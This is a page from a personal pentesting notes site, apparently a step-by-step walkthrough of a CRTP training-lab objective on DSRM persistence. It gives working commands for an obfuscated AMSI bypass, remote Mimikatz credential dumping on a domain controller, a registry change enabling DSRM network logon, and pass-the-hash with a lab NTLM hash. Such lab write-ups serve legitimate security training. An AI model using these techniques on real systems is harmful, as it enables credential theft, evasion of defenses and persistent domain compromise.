👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • Start a new session on the DC
  • Disable AMSI on the DC
  • Back on the host machine Load Mimikatz into memory on the $sess
  • Enter back into the PSSession on the DC
  • Dump the creds of the DC with Mimikatz
  • Modify the registry on the DC
  • Pass the hash
  • Access the DC
  1. Education
  2. Courses
  3. Paid Courses
  4. Pentester Academy
  5. CRTP
  6. CRTP Step By Step In Objectives

Obj 11 DSRM

Task - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

We can persist with administrative access on the DC once we have Domain Admin privileges by abusing the DSRM administrator. With the domain admin privileges obtained earlier, run the following commands on the DC to open a PowerShell remoting session. As always, remember that we could use other tools like SafetyKatz, BetterSafetyKatz etc.

Start a new session on the DC

PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.local
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Disable AMSI on the DC

[dcorp-dc.dollarcorp.moneycorp.local]:PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Back on the host machine Load Mimikatz into memory on the $sess

PS C:\AD\Tools\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

Enter back into the PSSession on the DC

PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Dump the creds of the DC with Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

The DSRM administrator is not allowed to logon to the DC from network. So we need to change the logon behavior for the account by modifying registry on the DC. We can do this as follows:

Modify the registry on the DC

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Now from our local system we can just pass the hash for the DSRM administrator:

Pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd  /run:powershell.exe"'

We can now access the dcorp-dc directly from the new session.

Access the DC

PS C:\Windows\System32> ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
PreviousObj 10 Skeleton KeyNextObj 12 DCSync

Last updated 2 years ago

🟣